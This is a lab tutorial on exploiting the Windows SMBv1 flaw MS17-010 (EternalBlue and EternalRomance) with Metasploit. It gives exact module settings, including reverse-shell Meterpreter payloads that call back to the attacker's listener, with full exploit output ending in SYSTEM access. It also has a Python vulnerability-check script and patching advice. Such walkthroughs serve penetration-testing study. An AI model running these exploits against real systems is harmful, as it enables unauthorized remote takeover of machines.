Certain vulnerabilities and exploits make headlines with their catchy names and impressive damage potential. EternalBlue is one of those exploits. Originally attributed to the NSA, this former zero-day exploited a flaw in the SMBv1 protocol that affected a large share of Windows machines and caused devastation worldwide. Here we will use EternalBlue to exploit SMB via Metasploit.
What is EternalBlue?
EternalBlue is an exploit most likely developed by the NSA as a former zero-day. It was released in 2017 by the Shadow Brokers, a hacker group known for leaking tools and exploits used by the Equation Group, which is believed to have links to the NSA's Tailored Access Operations unit.
EternalBlue is also referred to by the identifier of the Microsoft security bulletin that patched it, MS17-010, which is how the Metasploit modules used below are named. EternalBlue was the main spreading mechanism of WannaCry and NotPetya and was bundled into the EternalRocks worm; BadRabbit spread with the related EternalRomance exploit covered in Option 2.
Option 1: Exploit EternalBlue with Metasploit
We are using an unpatched copy of Windows Server 2008 R2 as the target for the first section of this tutorial. An evaluation version can be downloaded from Microsoft if you want to follow along.
Step 1: Find a module to use
The first thing we need to do is open a terminal and start Metasploit. Enter service postgresql start to initialize the PostgreSQL database if it is not already running, followed by msfconsole.
service postgresql start
msfconsole
Then use the search command in Metasploit to find a suitable module.
search eternalblue
Matching Modules
================

   Name                                           Disclosure Date  Rank     Check  Description
   ----                                           ---------------  ----     -----  -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
There is also a scanner module, auxiliary/scanner/smb/smb_ms17_010, that can be used to determine whether a target is vulnerable to MS17-010 before you attempt to exploit it. It is always a good idea to do this kind of reconnaissance first; otherwise you could waste a lot of time on a target that is not even vulnerable.
Once we have determined that our target is actually vulnerable to EternalBlue, we can use the exploit module from the search we just performed.
use exploit/windows/smb/ms17_010_eternalblue
You know you're in the right place when the prompt changes to exploit(windows/smb/ms17_010_eternalblue).
You can view the current settings with the options command.
options
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
First, we must specify the IP address of the target.
set rhosts 10.10.0.101
rhosts => 10.10.0.101
Next we load the trusty Meterpreter reverse_tcp shell as the payload.
set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
Then set the listening host (LHOST) to the IP address of our local machine.
set lhost 10.10.0.1
lhost => 10.10.0.1
And the listening port to an appropriate number.
set lport 4321
lport => 4321
That should be everything, so all that is left is to launch the exploit. Use the run command to fire it.
run
[*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.101:445 - Connecting to target for exploitation.
[+] 10.10.0.101:445 - Connection established for exploitation.
[+] 10.10.0.101:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.101:445 - CORE raw buffer dump (51 bytes)
[*] 10.10.0.101:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.10.0.101:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 10.10.0.101:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 10.10.0.101:445 - 0x00000030  6b 20 31                                         k 1
[+] 10.10.0.101:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.101:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.101:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.101:445 - Starting non-paged pool grooming
[+] 10.10.0.101:445 - Sending SMBv2 buffers
[+] 10.10.0.101:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.101:445 - Sending final SMBv2 buffers.
[*] 10.10.0.101:445 - Sending last fragment of exploit packet!
[*] 10.10.0.101:445 - Receiving response from exploit packet
[+] 10.10.0.101:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.101:445 - Sending egg to corrupted connection.
[*] 10.10.0.101:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.101
[*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.101:49207) at 2019-03-26 11:01:46 -0500
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
We can see a few things here: the SMB connection being made, the kernel pool being groomed, the exploit packet being sent, and finally a WIN banner as a Meterpreter session is opened. This exploit does not always succeed on the first try, so if it fails without crashing the target, simply run it again.
We can verify that we have compromised the target by running commands such as sysinfo to obtain operating system information.
sysinfo
Computer        : S02
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : DLAB
Logged On Users : 2
Meterpreter     : x64/windows
and getuid to get the current user.
getuid
Server username: NT AUTHORITY\SYSTEM
This exploit does not work as well on newer systems, and because it corrupts the kernel pool, a failed attempt can crash the target with a blue screen, so think twice before running it against anything in production. Next, we will look at a related exploit that is a bit more reliable but just as deadly.
Option 2: EternalRomance / EternalSynergy / EternalChampion
As if EternalBlue were not devastating enough, three more related exploits came out of the same leak. EternalRomance and EternalSynergy exploit a type confusion bug (CVE-2017-0143), while EternalChampion and EternalSynergy exploit a race condition (CVE-2017-0146).
These were combined into a single Metasploit module, which borrows from the classic psexec module to run the payload as a service. It is considered more reliable than EternalBlue, is less likely to crash the target, and works against unpatched versions of Windows up to Server 2016 and Windows 10.
The only caveat is that this exploit requires a named pipe. Named pipes are a mechanism for inter-process communication; a server exposes them much like files, so that other processes (including remote SMB clients, via the IPC$ share) can connect to them. The Metasploit module automatically tries a wordlist of common named pipes, so it is easy to use as long as at least one accessible named pipe exists on the target.
Step 1: Find a vulnerable target
We can use Nmap as an alternative to the Metasploit scanner to find out whether a target is vulnerable to EternalBlue. The Nmap Scripting Engine (NSE) is a powerful feature of the core tool that lets you run all sorts of scripts against a target.
Here we use the script smb-vuln-ms17-010 to check for the vulnerability. Our target is an unpatched evaluation copy of Windows Server 2016. Evaluation copies can be downloaded from Microsoft if you want to follow along.
We can specify a single script to run with the --script option, together with the -v flag for verbosity and the IP address of our target. First exit Metasploit (or open a new terminal) if you are still in msfconsole.
nmap --script smb-vuln-ms17-010 -v 10.10.0.100
Nmap will run and should not take long, since we are only running a single script. At the end of the output you will find the results.
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-26 11:05 CDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:05
...
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

NSE: Script Post-scanning.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.31 seconds
           Raw packets sent: 1181 (51.948KB) | Rcvd: 1001 (40.060KB)
We can see that the target is reported as vulnerable, along with other information such as the risk factor and links to the CVE and the Microsoft bulletin.
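Both scanners used in this tutorial, the auxiliary/scanner/smb/smb_ms17_010 module from Option 1 and the smb-vuln-ms17-010 Nmap script here, make the same decision: they open an anonymous SMBv1 session to IPC$ and issue a PeekNamedPipe transaction on an invalid file handle. A patched server answers STATUS_INVALID_HANDLE, while an unpatched one answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205). The following Python 3 script is an added example written for this page; it is not code from the tutorial, from Metasploit or from the Nmap project. It reimplements that check with only the standard library so you can see exactly what the scanners send. The lab address, the fixed PID and the buffer sizes are assumptions. It is a read-only probe that never triggers the bug, but run it only against machines you are authorized to test.

```python
import socket
import struct

# SMBv1 commands, the transaction subcommand the check relies on, and the status codes it keys on
SMB_COM_TRANSACTION, SMB_COM_NEGOTIATE = 0x25, 0x72
SMB_COM_SESSION_SETUP_ANDX, SMB_COM_TREE_CONNECT_ANDX = 0x73, 0x75
TRANS_PEEK_NMPIPE = 0x23
STATUS_SUCCESS, STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED = 0x0, 0xC0000008, 0xC0000022
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # only an unpatched server answers this
PID = 0xFEFF                                  # arbitrary fixed client process id (assumption)

def nb_frame(smb):
    # NetBIOS session service framing: type 0x00 + 24-bit big-endian length
    return b'\x00' + len(smb).to_bytes(3, 'big') + smb

def smb_header(command, tid=0, uid=0, mid=0, status=0):
    # 32-byte SMBv1 header; Flags 0x18, Flags2 0x4001 = NT status codes + long names (ASCII)
    return struct.pack('<4sBIBHH8sHHHHH', b'\xffSMB', command, status, 0x18, 0x4001,
                       0, b'\x00' * 8, 0, tid, PID, uid, mid)

def negotiate_request():
    # offer a single dialect, NT LM 0.12, so only an SMBv1-capable server can accept
    dialects = b'\x02NT LM 0.12\x00'
    return nb_frame(smb_header(SMB_COM_NEGOTIATE, mid=1)
                    + b'\x00' + struct.pack('<H', len(dialects)) + dialects)

def session_setup_request():
    # anonymous null session: no AndX, MaxBufferSize 4356, MaxMpx 2, VcNumber 0, SessionKey 0,
    # OEM password len 1, Unicode len 0, Capabilities NT_SMBS|STATUS32; then five empty strings
    params = struct.pack('<BBHHHHIHHII', 0xFF, 0, 0, 4356, 2, 0, 0, 1, 0, 0, 0x50)
    data = b'\x00' * 5   # password, account name, domain, native OS, native LAN manager
    return nb_frame(smb_header(SMB_COM_SESSION_SETUP_ANDX, mid=2)
                    + bytes([13]) + params + struct.pack('<H', len(data)) + data)

def tree_connect_request(target, uid):
    # connect to IPC$, the share that exposes named pipes
    path = ('\\\\%s\\IPC$' % target).encode() + b'\x00'
    params = struct.pack('<BBHHH', 0xFF, 0, 0, 0, 1)   # no AndX, Flags 0, PasswordLength 1
    data = b'\x00' + path + b'?????\x00'               # password, path, service type "any"
    return nb_frame(smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid, mid=3)
                    + bytes([4]) + params + struct.pack('<H', len(data)) + data)

def peek_named_pipe_request(tid, uid):
    # SMB_COM_TRANSACTION with setup words PeekNamedPipe / FID 0; no parameters or data,
    # so ParameterOffset and DataOffset both point at the end of the message (0x4A)
    name = b'\\PIPE\\\x00'
    offset = 32 + 1 + 32 + 2 + len(name)   # header + WordCount + 16 words + ByteCount + name
    params = struct.pack('<HHHHBBHIHHHHHBBHH', 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0, 0,
                         0, offset, 0, offset, 2, 0, TRANS_PEEK_NMPIPE, 0)
    return nb_frame(smb_header(SMB_COM_TRANSACTION, tid=tid, uid=uid, mid=4)
                    + bytes([16]) + params + struct.pack('<H', len(name)) + name)

def parse_response(frame):
    # (command, nt_status, tid, uid) of a framed SMBv1 reply; an SMB2 reply raises ValueError
    smb = frame[4:]
    if len(smb) < 32 or smb[:4] != b'\xffSMB':
        raise ValueError('not an SMBv1 response')
    command, status = struct.unpack_from('<BI', smb, 4)
    tid, _pid, uid = struct.unpack_from('<HHH', smb, 24)
    return command, status, tid, uid

def classify(status):
    # the same decision the Nmap script and the Metasploit scanner make
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return 'VULNERABLE'
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return 'NOT VULNERABLE'
    return 'UNKNOWN (0x%08X)' % status

def recv_frame(sock):
    # read exactly one NetBIOS frame: 4-byte header, then the announced length
    buf = b''
    while len(buf) < 4 or len(buf) < 4 + int.from_bytes(buf[1:4], 'big'):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError('connection closed by target')
        buf += chunk
    return buf

def check_host(target, port=445, timeout=5.0):
    # the four-message exchange against one host, returning a verdict string
    try:
        with socket.create_connection((target, port), timeout=timeout) as s:
            s.sendall(negotiate_request())
            _, status, _, _ = parse_response(recv_frame(s))
            if status != STATUS_SUCCESS:
                return 'SMBv1 negotiation failed (0x%08X)' % status
            s.sendall(session_setup_request())
            _, status, _, uid = parse_response(recv_frame(s))
            if status != STATUS_SUCCESS:
                return 'anonymous session refused (0x%08X)' % status
            s.sendall(tree_connect_request(target, uid))
            _, status, tid, _ = parse_response(recv_frame(s))
            if status != STATUS_SUCCESS:
                return 'IPC$ tree connect refused (0x%08X)' % status
            s.sendall(peek_named_pipe_request(tid, uid))
            _, status, _, _ = parse_response(recv_frame(s))
            return classify(status)
    except (OSError, ValueError) as exc:   # refused, timed out, closed or not SMBv1 at all
        return 'no usable SMBv1 service (%s)' % exc
```

Call check_host('10.10.0.100') (the lab address from this tutorial) from a Python shell or a small wrapper of your own. A host whose SMBv1 has been disabled, the mitigation recommended at the end of this tutorial, either closes the connection or answers with an SMB2 frame; the script reports that as no usable SMBv1 service rather than as patched, which is the distinction you want when confirming a remediation.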
Now that we know that the target is vulnerable, we can return to Metasploit and look for a suitable exploit.
msfconsole
search eternalromance
Matching Modules
================

   Name                                   Disclosure Date  Rank    Check  Description
   ----                                   ---------------  ----    -----  -----------
   auxiliary/admin/smb/ms17_010_command   2017-03-14       normal  Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   exploit/windows/smb/ms17_010_psexec    2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Then select the module with the use command.
use exploit/windows/smb/ms17_010_psexec
You'll know you're in the right place when the prompt reads exploit(windows/smb/ms17_010_psexec).
Let's look at our options:
options
Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target address range or CIDR identifier
   RPORT                 445                                                             yes       The target port
   SERVICE_DESCRIPTION                                                                   no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic
This exploit works through a wordlist of named pipes to probe and a share to connect to. We can leave all of that at the defaults for now, but we do have to set the remote host.
set rhosts 10.10.0.100
rhosts => 10.10.0.100
And the reverse shell payload.
set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
And our local host.
set lhost 10.10.0.1
lhost => 10.10.0.1
And local port.
set lport 4321
lport => 4321
We should be good to go now. Enter run to start the exploit.
run
[*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.100:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.0.100:445 - Built a write-what-where primitive...
[+] 10.10.0.100:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.0.100:445 - Selecting PowerShell target
[*] 10.10.0.100:445 - Executing the payload...
[+] 10.10.0.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (206403 bytes) to 10.10.0.100
[*] Meterpreter session 2 opened (10.10.0.1:4321 -> 10.10.0.100:49965) at 2019-03-26 11:12:30 -0500
We can see the payload run successfully, and we end up with a Meterpreter session.
Again, we can verify that we have compromised the system with commands such as sysinfo
sysinfo
Computer        : DC01
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : DLAB
Logged On Users : 4
Meterpreter     : x64/windows
and getuid.
getuid
Server username: NT AUTHORITY\SYSTEM
Prevention and Current Status
Despite all the damage EternalBlue has caused, there is a reliable way to prevent this class of exploit: patch your systems! At this point, almost two years after these vulnerabilities became public, there is really no excuse for unpatched operating systems. Where a host cannot be patched, disable SMBv1 entirely and block TCP port 445 at network boundaries; every MS17-010 exploit in this tutorial depends on reaching an SMBv1 server.
EternalBlue is still a problem today. Some organizations continue to run unpatched systems, often on pirated copies of Windows that never receive updates, so EternalBlue remains a major threat.
Cryptojacking, in which a victim's computer is secretly used to mine cryptocurrency, is another type of attack that has used EternalBlue to spread. WannaMine was one such outbreak that hijacked computers around the world in 2018.
Today we learned how to use EternalBlue with Metasploit. We also learned that a related exploit (EternalRomance/EternalSynergy/EternalChampion) is more reliable and works on more systems. In the next tutorial, we'll dig a little deeper and learn how to use EternalBlue manually, which is much more satisfying in the end.